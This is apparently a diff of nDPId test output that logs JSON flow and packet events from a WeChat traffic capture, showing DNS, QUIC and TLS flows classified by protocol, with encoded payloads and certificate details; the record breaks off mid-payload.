00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1492167350333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167350333,"pkt":"8IQvSpdgeJKcD6iOCABFAAA92D9AAEAR3brAqAFnwKgB\/rP+ADUAKS5MZgIBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167350333,"flow_last_seen":1492167350333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167350333,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -52,101 +52,101 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 01693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1492167351067,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":969,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":969,"pkt_l4_len":935,"thread_ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAO7bQZAAEARabPAqAFn2DrGLuD3AbsDp2YqDU3ZCrKMtFhpUTAzNQJxZNfHCC8u2f35luXQX7wk8+5+gy499Uo4Fg20rRdDDy5CsdXoRXrF+phU81nis1nRDRx09GXiKDxOppPR5wHoCPv6GGJ1a2aSeKMbWb+zwKTlNc+IgrbKFFqH047ViEQZsFLjifeqmjWw3kLjF9wuTO5xmTDc8NygVX92ZUjcWiRsZklVVPx3NbEThZxDUrne5HeS9hEKQhiWqsRNFsJ5ZewxcV+5cYvvBeYiQR+kS3f\/LZqZAjI6Q5gDCFVg4IVHBTbsdm3CNW6MkXX6Z21DpqBMIia1Z2wV8I9lmIjOLOKjoJcu+pem0sj3G6u1FBaJ6UzuToaeQVFoQV1B7THlLpcbWhfyxWuv5Vq5Nhbvz\/hy9e3GvHaPkX2Ap3unG8P22QcYcGd\/BWZtvoWlpacJDV2epOkkS7tt5wlFKOWfO8\/5Yu\/gJ5xuBFw7XGdmQknr+9LaS3e8wZiMR1ZfimH2Wrss8HcQEl9TcUi0OPt7hg4vPxA1umUMgAjxmP3GICQIJ8v3MSyfSe36zfbmMnzMFR+cZ4RVKOKFuZsig3U7Qla3oB3K2bziFfb7gRL+hERHc4YgKgGNFngj+oqw2jdkj\/RqXvOIZPBl74wKoDpJdAAu0pwpTpg0OYCvwu\/ep3j0WkfwnzYcwnEEOfrkyBT8sslKLByrPD6217xh62Bp0UxecAcjRSXYnXrLG4gF\/OklBRUl9MWf17862YoGJ6mbQ8Q1BCG\/ur
1PzAt2\/FqJ05MHkwrkRVSHl4pDeBaR66Du4ZmV0GBx989HTukTQy\/3OGUKXjAXhJdjcsLd1jo\/K0yDhk26WE7HHoqWgHvMgQjGE2RFzuX36OVzPCIEOwd9oe0YVvAfM\/rVc9genM5Hy7Sv8mutamuMH7bROMktPGAdZ\/IFx5w4VWad64HIS2eSUBLGRLvosHNSRrNdfupAMBGIyjJeytCFI+Ljtgl1sqegx6JwAaGxpjS+ZJjXdtHKXMd1GSxa\/aZjv\/gLSgGEeQHgpM0w997OPOSc\/oXhrMG2H9dPnVY0gxfZjD+EVSDAUqgCePMf4Xk+wruAsQ37\/lHXudBmH90ljRj8ye51wbrJXjVUKo39iLcU6hZ05\/StCBdO\/xPb895mMSP5JnWfCWFSaYGQN4FQQYatRm1PasNLHcHWO0PLezKCDM2gsmrDE3X\/KwGBhJhce2KxIu1Tjfe9ZeVoyy0Oxy0Bb7O\/93ta"} 02270{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1492167351121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167351121,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcR3XLYOsYuwKgBZwG74PcFTmzaBOou0Nigzud3ZaOudETm8GBczN7q3HxIUIOzVIoPsD73AQkDw5o48VPCPgxwE9bagOsfguW4BXFTqIT1IIV5ThjijbPacPMIeuYY+tLcR\/SESotUnfD6k31MBpngxATfGEoS3TSTc9aVt2BKPUkJNXTxIqajXh4z+2CjCT16kZiox8Qmel6o7NAeDdJDfOL+51L\/G92mnF40IupMo8kyn6Yeya9Ad1Q2D\/p2FAN4KbvETwnyCCrN\/3BzK6jhLgRMRUMpD76aZzYbZwTnnjn5cPWJgIaiNlEoyxA7CP6REtuotFUshn\/4\/Je7Jbm8GzbVpuThmCVdHsCKO9eQafmXETXyGPOX37U\/+RYvpidmrbPADR3IJ0YyPcE55eQPeQ3SLMLpJR+N0H26d91w3L3p89mtepH0NeIecXxbZcygXiO3ouImKiBH5Sols1nP6qAehqtyidEipR4ZPAV4Xw0h5rAYVjkhxL41hJnSJmoocaWAxV46W2QvJzsrabDi5M9SzvhRJAsPZZY4K6G5dvQpS2uzTzQOzxWkGBlQl7RRRgKZIcNK4yIcQD0yIGCwwoktA2Ld1Idk2Cu5os+Y7KXAeUWL4EghycwrRGckuLuUQjKt2wiWE8fO7O4\/Lv2VZCpq74PXu3G5CCkcU65VQJeeZrPt8UoeqowDQ+esOAIZ137WnNojv8+UsGDeg+xMKBRUrYaoT8ER8YifN6riDqUjipfNYkbEn8ucoDGqAIlyleAS5\/XHM13il1iRyxEOLilein7LTbUQNfwFOf8EzXgCnR+IpNR4wHUKNWXhmNPOYokIP23Sl\/FaC5yeTIvYRTQb\/x8mhYj\/WIs05PouLe9Pt+TRR3N2YyYcD4kqZDJk1bVFKuF7bqCGCM51z3lvURyUWHByifpl1Q0srxqBnb92qDujj+Ug5Hs9Ty\/kFB8qHvx1Dfq78jAeHz0fzz7AMlq+79RPkRIGLCbIkRGUTiiYKOqV8DW1cQsg\/KZWg+kdRSdfwb30mOCaUqILvOyhuHsdt\/VlQOncdoNcoPzCka952te
Jvpu3kHP0JF00GT6\/QgvMxqqvMT68gpqKr7VNH2JM4rMWfmQe7d70oO4rLXnu5+c5UkqU4+\/yoY+zdy1UMw3UYnE\/RB4x5v7QiQt4jRnCl6tLIdDw9lQg9IzEnVZzw2lt7lY+\/FC4dmux3GBahkU7C9wFjO9v95glXVXJsAYEhvS3wJvsdmH9ydK\/F3zD4bHe6QH8wln\/KtF+\/2hcmCsTO+QWhFCYnQytBu\/Dd7UqbnYMeu6CvYKHngUiBNqyzWOGJEUUIwiWru1HLQ+oi18IFAgJS2Pl99aG5LYQ83XtdOxJ4pO0nKlJ0xc1wx6vqc9D94XgPsJhPmRnKuyWzZTwOjFjJ4fG3PqBIeO52giJ97T6kI1ufnseC2DoOQ7mgmmkhk1xFPh\/iCEO2sH8\/yvC3ciJ3q1jHvS6trEx0psWwZhrcKMoj6uJQAqWOx\/4VMZblPtRO0JRK2sKrnR0AuXFvTgyJJXrSQnKCt4f0Ie08Z0FhokeNmZugGY11eoMg2b0Ohw1Gcl+Nco\/Mm0dOR0d0ZzowYYFQVn8Z1G5U0v2I0P+bjqBg\/Oft0VL\/uESmpcBS8+q9YYq03mdZfyrm0Wll6v2MrVZ+luVDiDPf+2zCNGMeJyqwXqCBY\/GUBtV\/ORVHwTg4O9+bDUiGoGMfoIrfv0WX52viV1sxsvodgKw\/K7R89paaPWnO6gRTKekrbX0nVKtcWseMnbmEds6efJmpuqUD3hZqUyUuRhdxz6a7pUXagTh"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1492167352068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352068,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePFAAEAGFx7AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO38PQAAAQEICgAwuQeFnMDK"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1492167352122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352122,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0OfYAACsGqnlA6ae8wKgBZxRsjLFKrVv6utDMqYAQAWVTqwAAAQEICoWdcMgAL7Ej"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1492167353674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1492167353674,"pkt":"eJKcD6iO8IQvSpdgCABFoAD6dwRAACwGsNrLzZeiwKgBZwG70ypPgUs4IVggsIAYAQuBHwAAAQEICkXRpIYAMKn\/FwMDAMGOrZUQQd+ekzcfermPixMN7baWMlCLOjLGRLUay7A9ywN4ZUGmiUXDO1gdTDC98QU1t8eAbnyMFUBj5qM3d0y5XCUUPMCeBhhxcxN\/8G4Ch12FyipeyhGtwqgzXcsPc5ZQsJ\/Yfu\/XdVaAYYDYsfkQdrrVo9IGd6i0jIOj1GEXv+MuFcw5UP8MbQ5QLfOihRir7leYEOxmHGeDrisZkZBhOzKLL2Q5myihhKQJ9yeXWCsp\/s4j9ebB8kfX1kVSE8Aa"} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1492167353675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353675,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0n8JAAEAGdYLAqAFny82XotMqAbshWCCwT4FL\/oAQAcj35wAAAQEICgAwuphF0aSG"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoXgBAAEAGtx\/AqAFny82X058lAbtnDvSGeC5ApFARAOXT9QAA"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwNAAEAG0kHAqAFny82XotNFAbtA8usy6z8oEoARAOWo0QAAAQEICgAwuptF0ZJx"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZmlAAEAGrtPAqAFny82XotNJAbvI4NzyAAAAAKACchB6zAAAAgQFtAQCCAoAMLqbAAAAAAEDAwc="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353937,"flow_last_seen":1492167353937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353937,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1492167353937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353937,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8a3xAAEAGqcDAqAFny82XotNKAbuhD9GmAAAAAKACchCtqQAAAgQFtAQCCAoAMLraAAAAAAEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vARAACwGbKDLzZeiwKgBZwG700XrPygSQPLrM4ARAHCW2wAAAQEICkXRpNsAMLqb"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwRAAEAG0kDAqAFny82XotNFAbtA8usz6z8oE4AQAOWWFAAAAQEICgAwuu1F0aTb"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1492167354046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354046,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK49AAC4G+vDLzZfTwKgBZwG7nyV4LkCkZw70h1AQAHPUZwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"} -00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwt